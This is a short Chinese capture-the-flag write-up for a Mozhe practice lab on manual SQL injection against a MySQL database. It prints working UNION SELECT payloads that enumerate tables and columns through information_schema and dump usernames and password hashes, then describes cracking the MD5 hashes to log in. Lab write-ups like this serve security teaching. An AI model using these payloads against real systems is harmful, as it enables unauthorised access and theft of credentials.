墨者--SQL手工注入漏洞测试(MySQL数据库)

墨者–SQL手工注入漏洞测试(MySQL数据库)

靶机入口
解题思路:

  1. 判断注入
  2. 利用order by 判断字段数量
  3. 联合注入

1、判断注入
墨者--SQL手工注入漏洞测试(MySQL数据库)_第1张图片墨者--SQL手工注入漏洞测试(MySQL数据库)_第2张图片
2、order by判断
墨者--SQL手工注入漏洞测试(MySQL数据库)_第3张图片墨者--SQL手工注入漏洞测试(MySQL数据库)_第4张图片
3、联合注入
墨者--SQL手工注入漏洞测试(MySQL数据库)_第5张图片
查库名
墨者--SQL手工注入漏洞测试(MySQL数据库)_第6张图片
and 1=2 union select 1,table_name,3,4 from information_schema.tables where table_schema=”库名”
墨者--SQL手工注入漏洞测试(MySQL数据库)_第7张图片
and 1=2 union select 1,2,column_name,4 from information_schema.columns where table_name=”表名”
墨者--SQL手工注入漏洞测试(MySQL数据库)_第8张图片
查出所有列名
and 1=2 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name=”表名”
墨者--SQL手工注入漏洞测试(MySQL数据库)_第9张图片
and 1=2 union select 1,group_concat(password),group_concat(name),4 from 库名.表名墨者--SQL手工注入漏洞测试(MySQL数据库)_第10张图片
4、md5解密,登陆
墨者--SQL手工注入漏洞测试(MySQL数据库)_第11张图片
墨者--SQL手工注入漏洞测试(MySQL数据库)_第12张图片
恭喜发财拿到key!

你可能感兴趣的:(墨者练习题)